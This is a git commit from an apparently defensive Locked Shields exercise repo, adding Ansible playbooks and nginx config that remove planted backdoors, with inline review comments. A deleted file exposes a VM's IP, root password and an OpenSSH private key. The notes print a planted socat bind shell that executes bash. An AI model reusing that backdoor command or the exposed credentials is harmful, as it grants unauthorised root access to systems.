Add ansible playbooks

master
Gašper Spagnolo 2024-02-02 12:18:11 +01:00
parent 9dca42d692
commit f4b89117bd
10 changed files with 228 additions and 56 deletions


@ -1,19 +0,0 @@
Welcome to Locked Shields 2024 Linux challenge. Here are the credentials to your
VM with all the tasks described after first login.
VM details:
- IP: 64.227.120.192
- Username: root
- Password: Admin1Admin1
- ssh access key:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDvwy4nRU7fgRGvGGxShNQ8Mo24XcYYGSRmWAzrGxRlYQAAALAQAixuEAIs
bgAAAAtzc2gtZWQyNTUxOQAAACDvwy4nRU7fgRGvGGxShNQ8Mo24XcYYGSRmWAzrGxRlYQ
AAAEB7zUu4b0VNeTX7zTwE5DQNXABZ26tw1EhOMZ0B/yCmgu/DLidFTt BEa8YbFKE1Dwy
jbhdxhgZJGZYDOsbFGVhAAAAJm5lamNASmVybmVqLVBvcmVudGFzLU1hY0Jvb2stUHJvLm
xvY2FsAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
This message can be viewed only once, so don't forget to store the credentials.


@ -0,0 +1,35 @@
iserver {
listen 443 ssl default_server;
listen [::]:443 ssl default_server;
include snippets/snakeoil.conf;
root /var/www/html;
index index.html index.htm index.php;
listen 80 default_server;
server_name _;
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
# Add security headers
add_header X-Frame-Options "SAMEORIGIN";
add_header X-Content-Type-Options "nosniff";
add_header X-XSS-Protection "1; mode=block";
}
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php-fpm.sock;
}
location ~ /\. {
deny all;
}
}
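Review bot: The three `add_header` directives sit only inside `location /2048/`, so responses from `location /` and the PHP location carry no `X-Frame-Options` or `X-Content-Type-Options` at all; nginx does not merge `add_header` from a parent into a location that declares its own, so the simplest fix is to move the three lines up to server context (and drop `X-XSS-Protection`, which current browsers ignore and which a `Content-Security-Policy` supersedes). The block opener reads `iserver {`; if that is literal rather than a rendering artifact, nginx rejects the whole file with an unknown-directive error, so the deploying playbook should run `nginx -t` before any reload. `location ~ \.php$` hands every matching URI to PHP-FPM and relies on `snippets/fastcgi-php.conf` for its `try_files` guard — confirm that snippet exists on the target, since a missing include is also a hard load failure.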


@ -1,37 +0,0 @@
Last login: Thu Feb 1 14:51:05 2024 from 89.212.81.147
_ _ _ _____ _ _ _ _ ___ _ _
| | | | | |/ ____| | (_) | | | | |__ \| || |
| | ___ ___| | _____ __| | (___ | |__ _ ___| | __| |___ ) | || |_
| | / _ \ / __| |/ / _ \/ _` |\___ \| '_ \| |/ _ \ |/ _` / __| / /|__ _|
| |___| (_) | (__| < __/ (_| |____) | | | | | __/ | (_| \__ \/ /_ | |
|______\___/ \___|_|\_\___|\__,_|_____/|_| |_|_|\___|_|\__,_|___/____| |_|
Welcome to the very vulnerable VM, somewhat similar what we can expect at Locked
Shields.
There are few tasks for you:
- protect the VM preserving the following services in running (and secure)
state:
- web server
- ssh server: all users (including root) should be allowed to login
- dns server
- identify as many vulnerabilities in the VM as possible
- all passwords are set to `Admin1Admin1`. You are encouraged to change them.
- write down the vulnerabilities with short explanation what this vulnerability
can cause
- write ansible playbook (preferred) or a bash script, which will mitigate the
vulnerabilities and will still serve the web, ssh and dns services
- share the "documentation" with description of identified vulnerabilities and
code to lockedshields@ssrd.io. Github links preferred.
Some notes:
- the VM will be forcefully shutdown so make changes permanent
- root user should be allowed to login from 138.68.128.150 with the following ssh
keys:
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC55vv1HAHwUOxZ+Zn4IcswclUkLEP2eA0tJG3BwE0pO
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINKOliO5L0TA84lclwmsdu+Wcm/r3LDQH9G2jICZ3ECC
- defense (and documentation, either through code or description) is more
important than finding vulnerabilities
- you do not need to go into details explaining vulnerabilities
- we will share the planted vulnerabilities afterwards


@ -0,0 +1,33 @@
---
- name: Secure Nginx Web Server
hosts: your_web_server
become: yes
tasks:
- name: Copy nginx configuration file with XSS protection and dot file access denial
template:
src: nginx_secure_config.j2
dest: /etc/nginx/sites-available/default
notify:
- Reload Nginx
- name: Ensure nginx snakeoil.conf is included
lineinfile:
path: /etc/nginx/sites-available/default
regexp: '^include snippets/snakeoil.conf;'
line: 'include snippets/snakeoil.conf;'
notify:
- Reload Nginx
- name: Ensure nginx PHP location is configured correctly
lineinfile:
path: /etc/nginx/sites-available/default
regexp: '^location ~ \.php\$ {'
line: 'location ~ \.php$ {'
notify:
- Reload Nginx
handlers:
- name: Reload Nginx
systemd:
name: nginx
state: restarted
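Review bot: The two `lineinfile` tasks after the `template` task are redundant — the template already carries `include snippets/snakeoil.conf;` and `location ~ \.php$ {` — and risky: both regexps are anchored at column 0, so if the rendered template indents those lines (as nginx configs normally are) nothing matches and `lineinfile` appends a bare `include …` and a bare `location ~ \.php$ {` after the server block's closing `}`, leaving an unclosed brace that makes nginx refuse the site. Dropping the two tasks, or at minimum prefixing the regexps with `^\s*`, avoids that. The handler `Reload Nginx` actually does `state: restarted`; `state: reloaded` is what the name promises and is the usual choice after a config edit, ideally preceded by a `command: nginx -t` task so a broken file is caught before the running server is touched. `become: yes` should be `become: true` per yamllint's truthy rule.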


@ -0,0 +1,7 @@
---
- name: Delete shell.php in Podman container
hosts: localhost
gather_facts: no
tasks:
- name: Run Podman command to delete shell.php
command: "podman exec -it 4d05d4a1a404 rm -f /var/www/html/shell.php"
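Review bot: `podman exec -it` asks for a TTY, which Ansible's `command` module does not provide, so the task is likely to fail or warn before `rm` runs; drop the flags: `command: podman exec 4d05d4a1a404 rm -f /var/www/html/shell.php`. The hard-coded container ID is fragile as well — it changes whenever the container is recreated — so a container name, or a variable resolved from `podman ps`, would make the play reusable. Deleting the file removes the artifact only: if the container image or a bind-mounted host directory still holds `shell.php` it comes back on the next restart, so that source should be checked, and the task should carry `changed_when`/`failed_when` so the run reports honestly. `gather_facts: no` should be `gather_facts: false`.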


@ -0,0 +1,13 @@
---
- name: Unset functions and kill processes
hosts: your_target_host
become: yes
tasks:
- name: Unset functions netstat, ps, pstree, and ss
shell: unset -f netstat ps pstree ss
ignore_errors: yes
- name: Find and kill processes using port 2227
shell: |
ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*pid=//;s/,.*//' | xargs kill -9
ignore_errors: yes
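Review bot: `shell: unset -f netstat ps pstree ss` has no lasting effect — it runs in a fresh non-interactive shell and the unset dies with it, while whatever rc file defines those functions (the notes hunk later in this commit shows an `ss ()` definition) redefines them for every new login. The durable fix is to remove the definitions from that file with `lineinfile`/`blockinfile` (path to be confirmed on the host) instead of unsetting them. The kill task removes the listener on port 2227 but not what respawns it — the notes in this commit record that it came back — so the `screen -d -m … socat` launcher (cron entry, systemd unit or timer, rc script) needs to be found and disabled or this task is a one-off. `xargs -r kill -9` avoids an error when nothing is listening, which removes the need for `ignore_errors`, and `ignore_errors: yes`/`become: yes` should be `true`.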


@ -0,0 +1,42 @@
---
- name: Update SSH server configuration
hosts: your_target_host
become: yes
tasks:
- name: Disable empty password login
lineinfile:
path: /etc/ssh/sshd_config
regexp: '^PermitEmptyPasswords'
line: 'PermitEmptyPasswords no'
notify:
- Restart SSH
- name: Disable password authentication
lineinfile:
path: /etc/ssh/sshd_config
regexp: '^PasswordAuthentication'
line: 'PasswordAuthentication no'
notify:
- Restart SSH
- name: Update AuthorizedKeysFile
lineinfile:
path: /etc/ssh/sshd_config
regexp: '^AuthorizedKeysFile'
line: 'AuthorizedKeysFile .ssh/authorized_keys'
notify:
- Restart SSH
- name: Remove other AuthorizedKeysFile settings
replace:
path: /etc/ssh/sshd_config
regexp: '^AuthorizedKeysFile.*'
replace: ''
notify:
- Restart SSH
handlers:
- name: Restart SSH
service:
name: sshd
state: restarted
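Review bot: `Remove other AuthorizedKeysFile settings` runs after `Update AuthorizedKeysFile`, and its regexp `^AuthorizedKeysFile.*` matches the very line the previous task wrote, so the play ends with no `AuthorizedKeysFile` directive and sshd falls back to its compiled-in default; if the intent is to strip a planted extra key path and keep `.ssh/authorized_keys`, the `replace` task must come before the `lineinfile` task. Each `lineinfile` appends at end of file when its regexp finds nothing, and directives after a `Match` block in `sshd_config` apply only to that block, so `insertbefore: '^Match'` (with `firstmatch: true`) is worth adding to all three. A bad edit followed by `Restart SSH` locks you out of a remote host, so each `lineinfile` should carry `validate: '/usr/sbin/sshd -t -f %s'`. `become: yes` should be `become: true`.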


@ -0,0 +1,15 @@
---
- name: Remove and restart cron job
hosts: your_target_host
become: yes
tasks:
- name: Remove the specified cron job
lineinfile:
path: /etc/cron.d/e2scrub_all # Specify the path to your cron job file
regexp: '^(.*/sbin/xfsscrub_all.*)$' # Match the line containing /sbin/xfsscrub_all
state: absent # Remove the line if found
- name: Restart the cron service
service:
name: cron
state: restarted
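Review bot: The task removes the line invoking `/sbin/xfsscrub_all` from `/etc/cron.d/e2scrub_all` but leaves whatever that path points to in place and looks nowhere else — other files in `/etc/cron.d`, `/etc/cron.{hourly,daily,weekly}`, user crontabs and systemd timers are all places the same job could be rescheduled from. If that path is confirmed to be the planted artifact, a `file: path: /sbin/xfsscrub_all state: absent` task (or a quarantine copy for the write-up) should accompany the line removal. cron re-reads `/etc/cron.d` on its own when a file's mtime changes, so `Restart the cron service` is harmless but not required. `become: yes` should be `become: true`.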


@ -0,0 +1,19 @@
---
- name: Fix MySQL systemd service and restart MySQL
hosts: your_target_host
become: yes
tasks:
- name: Remove --skip-grant-tables from mysql.service file
lineinfile:
path: /lib/systemd/system/mysql.service
regexp: '^ExecStart=/usr/sbin/mysqld --skip-grant-tables'
line: 'ExecStart=/usr/sbin/mysqld'
notify:
- Reload and Restart MySQL
- name: Reload and Restart MySQL
systemd:
name: mysql
state: restarted
ignore_errors: yes
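Review bot: Editing `/lib/systemd/system/mysql.service` and then doing `state: restarted` does not pick up the change — systemd keeps the loaded unit, `--skip-grant-tables` included, until a daemon-reload — so add `daemon_reload: true` next to `state: restarted`. No `handlers:` key is visible in this section, so `Reload and Restart MySQL` appears to be an ordinary task, and a `notify` whose target is not a handler fails the play at parse time; either move it under `handlers:` or drop the `notify` (the rendering has lost indentation, so a `handlers:` line may simply be missing here — worth confirming). `ignore_errors: yes` on the restart hides the one failure that matters most, MySQL not coming back with grant tables enabled, and should go. Editing the packaged unit is also undone by the next `mysql-server` upgrade; a drop-in at `/etc/systemd/system/mysql.service.d/override.conf` that resets `ExecStart=` survives that.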


@ -392,6 +392,8 @@ ss ()
} }
``` ```
Tried: Tried:
```bash ```bash
@ -417,6 +419,15 @@ root@ls-2024-9:/etc/ssh# ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*p
1673 1673
``` ```
After some time reverse shell is back.
```bash
root 1672 0.0 0.1 4172 1952 ? Ss 08:01 0:00 SCREEN -d -m /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
root 1673 0.0 0.0 10292 900 pts/1 Ss+ 08:01 0:00 \_ /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
```
Killed it and I hope it does not come back.
### e bit in pexec ### e bit in pexec
```bash ```bash
@ -747,3 +758,56 @@ grep -R "meta l4proto tcp ip saddr 10.88.0.0/16 tcp dport 8018 counter packets"
Returns empty match. Returns empty match.
But iguess this is just for the container to communicate. Nothing to worry about iguess. But iguess this is just for the container to communicate. Nothing to worry about iguess.
### SMTP
```bash
# See /usr/share/postfix/main.cf.dist for a commented, more complete version
# Debian specific: Specifying a file name will cause the first
# line of that file to be used as the name. The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no
# appending .domain is the MUA's job.
append_dot_mydomain = no
# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h
readme_directory = no
# See http://www.postfix.org/COMPATIBILITY_README.html -- default to 3.6 on
# fresh installs.
compatibility_level = 3.6
# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_tls_security_level=may
smtp_tls_CApath=/etc/ssl/certs
smtp_tls_security_level=may
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
myhostname = ls-2024-9
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = $myhostname, ls-2024-9, localhost.localdomain, , localhost
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = all
```